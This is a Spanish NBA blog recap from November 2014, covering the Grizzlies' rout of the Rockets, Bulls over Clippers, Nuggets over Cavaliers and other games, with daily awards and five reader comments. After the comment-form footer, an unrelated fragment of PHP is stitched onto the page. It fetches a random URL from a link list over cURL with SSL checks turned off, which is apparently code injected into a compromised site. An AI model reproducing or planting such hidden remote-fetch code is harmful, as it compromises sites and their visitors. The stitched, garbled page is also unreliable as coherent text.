La crónica: Best of the West

18 de November de 2014 por MagicJohnson32

Dos de los grandes protagonistas de este inicio de campaña se jugaban el liderato del Oeste en un partido sorprendentemente poco disputado. Solo podía quedar uno, y los Grizzlies se aseguraron de ser ellos. La sorpresa fue la tónica general de la madrugada en la NBA que repasamos a continuación.

Allá vamos.

Houston Rockets 93 – Memphis Grizzlies 119

Llegaban Rockets y Grizzlies con idéntico balance, 9-1, compartiendo la cabeza de la conferencia y excelentes sensaciones fundamentadas en la apuesta por la solidez defensiva. 48 minutos más tarde, quien manda en el Oeste y en la NBA son los Grizzlies, vencedores por K.O., muy superiores ya desde el primer cuarto, cuando abrieron una brecha de 16 puntos apoyada en un parcial de 3-21 para cerrar el periodo inicial. No hubo mayor historia a partir de ese momento, porque Memphis no permitió que la hubiese. Los discípulos de Joerger maniataron a James Harden, que no anotaba tan pocos puntos (6) desde noviembre de 2012, y dejaron hecha cenizas la hasta ahora mejor defensa de la liga. Para resumir la brillante victoria de los Grizzlies no hace falta mencionar un nombre propio: cada uno cumplió su papel y el colectivo fue una vez más el MVP del mejor equipo de la NBA después de tres semanas de regular season.

Chicago Bulls 105 – L.A. Clippers 89

Sin Pau Gasol, bueno es Taj Gibson. Sin Derrick Rose, ahí está Kirk Hinrich. ¿Necesita usted un líder? Llame a Jimmy Butler. Puede que los Bulls tengan esta temporada un perfil más alto, de serio candidato al título, pero la experiencia de las últimas temporadas le ha labrado un carácter de ‘underdog’ que le va de maravilla cuando las circunstancias se complican. Así, pese a las bajas de Gasol y Rose, pese al -14 que acumulaban en el segundo cuarto frente a los Clippers, el equipo se creció, remontó antes del descanso y en la segunda mitad se impuso incluso con comodidad. Gibson, Dunleavy, Noah y Butler fueron mejores que Paul, Griffin, DeAndre y Crawford, con lo que está todo dicho.

Denver Nuggets 106 – Cleveland Cavaliers 97

Decíamos que había sido una noche de sorpresas. Ninguna como la vista en Cleveland. No es porque los Cavs no ofrezcan dudas, pero tras su exhibición ante los Hawks y frente a los Nuggets, tal vez la mayor decepción del inicio de curso, se esperaba una victoria local como mínimo contundente. Ni contundente, ni victoria. Denver, un verdadero desastre en casi cada partido disputado hasta el momento, firmó el partido más serio que le hemos visto hasta el momento y, de la mano de Lawson y Afflalo, desnudó las carencias de estos Cavaliers dubitativos. LeBron, griposo, cumplió, como también lo hicieron Irving y Love, pero los números de sus estrellas no disimulan los defectos que, lógicamente, aún presenta el proyecto de Blatt.

Resto de la jornada

El partido más espectacular de la madrugada lo jugaron Suns y Celtics, con victoria de los de Arizona (118-114) y gigantesca actuación de Markieff Morris (ver premios del día unas líneas más abajo). Rondo, al filo de nuevo del triple doble aunque con 5 pérdidas y 2 de 10 en tiros libres. No se puede tener todo en esta vida. Uno que lo tiene casi todo pero se quedó sin victoria es Anthony Davis, fabuloso una vez más pero testigo de la quinta victoria seguida de los Blazers (93-102) con Aldridge y Lillard estelares. Los Heat, por su parte, retomaron la senda de la victoria sin Wade ni Deng, a costa de unos Nets en crisis (95-83). Brillaron -quién lo iba a decir hace un año- Chalmers y Bogdanovic. Otros en crisis son los Pistons, pese al fantástico momento de forma que atraviesa Jennings. Anoche cayeron en casa (107-93) ante unos Magic más competitivos de lo que pensábamos pero en los que Vaughn parece decidido a marginar al rookie Payton. Tobias Harris se merendó a Josh Smith y Vucevic añadió otra muesca a su cinturón. Poca historia, o más bien ninguna, hubo en las victorias de Mavs en Charlotte (107-80) y Spurs contra Sixers (75-100), un partido en el que Matt Bonner (repetimos: Matt Bonner) fue el máximo anotador.

PREMIOS

MVP: Markieff Morris jugó el partido de su vida en la victoria de los Suns en Boston. Anotó 30 puntos que redondeó con 5 asistencias y 7 rebotes. La pareja de los Magic Nikola VucevicTobias Harris sigue rindiendo a gran nivel en este inicio de temporada. 25 puntos y 14 rebotes para el montenegrino y 24 puntos, 4 asistencias, 5 rebotes y 5 robos para Harris.

Rookie: Bojan Bogdanovic empieza a ser el único rookie que suma actuaciones realmemente destacadas. Anoche fue el mejor de los Nets con 22 puntos.

Sorpresa: El mal partido de Olynyk dejó via libre a Tyler Zeller que aprovechó a la perfección su ocasión: 19 puntos prácticamente sin fallo y 7 rebotes en 24 minutos. Otro que se salió fue Darrell Arthur que anotó 14 puntos con un 3 de 4 en triples y cogió 11 rebotes. Y atentos a Alex Len que parece que coge carrerrilla: 19 puntos y 7 rebotes. ¿Hemos dicho ya que Matt Bonner fue máximo anotador de un partido?

Decepción: Kelly Olynyk fue incapaz de anotar un punto ante los Suns y además se vio superado en todo momento por Markieff Morris. James Harden cuajó el peor partido de lo que llevamos de temporada al anotar solo 6 puntos con un 1 de 8 en TC, los mismos puntos que un Al Jefferson que no pasa por su mejor momento.

Esfuerzo en vano: La baja de Omer Asik le dejó solo ante el peligro pero Anthony Davis cumplió con creces. 31 puntos, 11 rebotes, 3 asistencias, 3 robos y 3 tapones que sin embargo no compensaron el mal partido de los exteriores de los Pelicans.

Top 10
Comenta

5 comentarios a esta entrada

  1. jhc dice:
    #1

    seria bonito ver a Memphis jugar unas finales…

      Citar

  2. Denise dice:
    #2

    Pues si, Vaughn marginando a Payton al igual que lo hace con Harkless, Nicholson…. Y el próximo va a ser Aaron Gordon, ya vereis cuanto juega una vez que vuelva O’quinn. El problema es que están ganando y eso está tapando lo malo que es Vaughn de coach.
    Ver para creer, Orlando primero de la liga en porcentajes triple (41,3%).

    Por cierto, 11.000 espectadores en el Palace Auburn Hills, con lo frío que debe estar el pabellón, los gritos chillones de Van Gundy se deben escuchar de escandalo..

      Citar

  3. Ruxixon dice:
    #3

    ¿A alguien le pasa con Memphis lo que a mí?Un poco al estilo de los Spurs,en plan nada,ya alcanzaron su máximo así que ahora ya les toca bajar…y erre que erre,ellos mejorando.La verdad es que desde que la trayectoria avala sobradamente a Robert Pera y a su ejército de calculones,y porque no,a Joerger,que pensaba que sería un fiasco tras la marcha de Hollins.Quien tiene boca se equivoca.

      Citar

  4. rumbero dice:
    #4

    Ruxixon:
    ¿A alguien le pasa con Memphis lo que a mí?Un poco al estilo de los Spurs,en plan nada,ya alcanzaron su máximo así que ahora ya les toca bajar…y erre que erre,ellos mejorando.La verdad es que desde que la trayectoria avala sobradamente a Robert Pera y a su ejército de calculones,y porque no,a Joerger,que pensaba que sería un fiasco tras la marcha de Hollins.Quien tiene boca se equivoca.

    Yo también soy del club, no apostaría por ellos para llegar muy lejos pero cada vez me gustan más. Y siempre hablamos del conjunto y la buena pintura que tienen, pero Conley ahora mismo esta a un nivel altísimo. Pieza clave del equipo. Entre él y Carter remontaron contra los Kings y ayer les pega un baile de los buenos a los Rockets en poco más de 20 minutos. A todo esto los Rockets con 2 partidos contra gallos del oeste (los Spurs de los jueves no cuentan) y 2 derrotas.

      Citar

  5. Nacho dice:
    #5

    Es que Conley es un jugadorazo. De los tíos más infravalorados. Me parece un jugón en la onda Parker, tiene pocos momentos de desconexión yo me lo guiso yo me lo como (que tanto practican esos llamados mejores bases), y es un tipo de equipo. Se ve la química que tiene en la cancha con Marc, y cómo los dos saben dar rienda suelta a Randolph de vez en cuando.
    Y lo que mola de tos grizzlies, es que juegan a lo que haya que jugar, a defensa, a muchos puntos. Y sí, Ruxixon, tienen aroma Spurs.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>